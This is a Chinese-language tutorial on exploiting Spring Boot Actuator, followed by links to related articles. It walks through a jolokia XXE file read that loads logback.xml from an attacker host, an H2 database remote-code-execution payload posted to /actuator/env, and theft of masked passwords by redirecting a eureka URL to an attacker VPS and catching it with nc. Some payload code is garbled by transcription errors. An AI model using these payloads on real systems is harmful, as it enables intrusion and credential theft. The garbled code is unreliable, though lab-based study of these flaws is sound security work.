16 spring boot漏洞利用

简介: Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开箱即用的模块,如:Spring JDBC、Spring MVC、Spring Security.Spring AOP、Spring ORM、Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早期阶段,我们需要编写大量的代码来将记录插入到数据库中。但是通过使用Spring JDBC模块的JDBCTemplate,我们可以将操作简化为几行代码。|

Spring Boot是Pivotal团队在Spring的基础上提供的一套全新的开源框架,其目的是为了简化Spring应用的搭建和开发过程。Actuator是SpringBoot自带监控功能Actuator,可以帮助实现对程序内部运行情况监控,比如监控状况、Bean加载情况、环境变量、日志信息、线程信息等

界面特征
/evn
绿色小树叶

常见端口

实际案例
1.x版本http://ip:port/env
2.X版本http://ip:port/actuator/env

环境搭建
https://github.com/veracode-research/actuator-testbed

  • mvn install
  • mvn spring-boot:run

如何安装mvn(maven)? apt install mvn / yum install maven如何更改mvn源?https://www.cnblogs.com/shunzi115/p/12521630.html

如何使用mvn?
https://www.runoob.com/maven/maven-tutorial.html

批量扫描
https://github.com/rabbitmask/SB-Actuator

漏洞利用——jolokia XXE任意文件读取
是否存在

image.png

漏洞利用攻击机
logback.xml
image.png

fileread.dtd
image.png

python3 -m http.server 8989

http://139.198.109.12:8090/olokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.,jmx.
JMXConfigurator/reloadByURL/http://47.115.9.13:8000!/logback.xml
注意修改攻击机的ip和端口

漏洞利用——rce spring-boot-actuator-h2-rce
-漏洞环境搭建
git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
['git连接不上就下载再复制]
cd spring-boot-actuator-h2-rce
docker build -t spaceraccoon/spring-boot-rce-lab.
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

浏览器访问

对/actuator/env发POST包

("name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String
shellexec(String cmd) throws java.io.IOException ( java.util.Scanner s = new
java.util.Scanner(Runtime.getRuntime().exec(cmd).getlnputStream()); if (s.hasNext()) (return s.next();} throw
new lllegalArgumentException():)'; CALL EXEC('curl ');"

对/actuator/restart 发POST包

burp自带dnslog平台
image.png

image.png

查看burp的dnslog平台,可以查看到解析记录

image.png

可以执行系统命令

漏洞利用——env敏感信息脱星
漏洞简介
访问/env 接口时,spring actuat&会将一些带有敏感关键词(如password、secret)的属性名对应的属性值用*号替换达到脱敏的效果
GET请求目标网站的/env或/actuator/env 接口,搜索*关键词,找到想要获取的被星号遮掩的属性值对应的属性名。

脱星:网页上一些铭感信息会打上*号

-漏洞利用

spring 1.x:
POST /env
Content-Type: application/x-www-form-urlencoded
eureka.client.serviceUri.defaultZone=http://value:S(security.user.password}@your-vps-ip
spring 2.x:
POST /actuator/env
Content-Type: application/json
("name":"eureka.client.serviceUrl.defaultZone","value":"http://value:S{security.user.password}@your-vps-ip"}

抓取接口信息 修改为post 修改值
image.png

image.png

刷新配置

image.png
image.png

攻击机监听端口: nc -lvvp 8000 将Basic base64解码 即可得到明文
base64解密:
image.png

相关文章
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
108 1
|
Prometheus 监控 安全
SpringBoot Actuator未授权访问漏洞的解决方法
SpringBoot Actuator未授权访问漏洞的解决方法Actuator 是 SpringBoot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。
22094 0
|
8天前
|
存储 安全 Java
发现 XSS 漏洞?别急!SpringBoot这招轻松搞定!
在SpringBoot中,发现XSS(跨站脚本)漏洞时,可以通过一系列措施来轻松搞定这些安全问题。XSS攻击允许攻击者在受害者的浏览器中注入恶意脚本,这些脚本可以窃取用户的敏感信息、劫持用户会话或进行其他恶意操作。以下是一些在SpringBoot中修复XSS漏洞的有效方法
27 7
|
12月前
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
322 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
|
SQL XML JSON
Springboot 的这些漏洞你了解吗?在使用中一定要注意!!
Springboot 的这些漏洞你了解吗?在使用中一定要注意!!
4134 0
|
存储 安全 前端开发
springboot下xss漏洞的修复
还有很多修复方式,比如可以利用springcloud gateway进行过滤,但是主要应用本身也要进行加固,网关只能过滤外部威胁
598 0
|
监控 安全 IDE
Springboot Actuator未授权访问漏洞复现
Springboot Actuator未授权访问漏洞复现
2126 0
|
安全 Java Serverless
Spring Cloud Function SPEL 远程命令执行漏洞
Spring Cloud Function SPEL 远程命令执行漏洞
417 0
|
SQL 安全 前端开发
如何预防SQL注入,XSS漏洞(spring,java)
SQL注入是由于程序员对用户输入的参数没有做好校验,让不法分子钻了SQL的空子,
331 0
|
安全 IDE Java
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查